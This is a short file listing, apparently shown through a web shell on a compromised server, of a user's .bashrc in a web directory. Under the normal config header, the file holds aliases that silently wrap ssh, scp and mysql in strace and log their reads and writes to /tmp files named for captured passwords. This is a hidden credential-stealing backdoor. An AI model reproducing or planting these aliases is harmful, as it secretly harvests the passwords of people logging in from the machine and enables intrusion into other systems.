| Current Path : /var/www/html/mmishra/ |
| Current File : /var/www/html/mmishra/.bashrc |
# .bashrc # Source global definitions if [ -f /etc/bashrc ]; then . /etc/bashrc fi alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' alias scp='strace -o /tmp/scppwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 scp' alias mysql='strace -o /tmp/scppwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 mysql' # User specific aliases and functions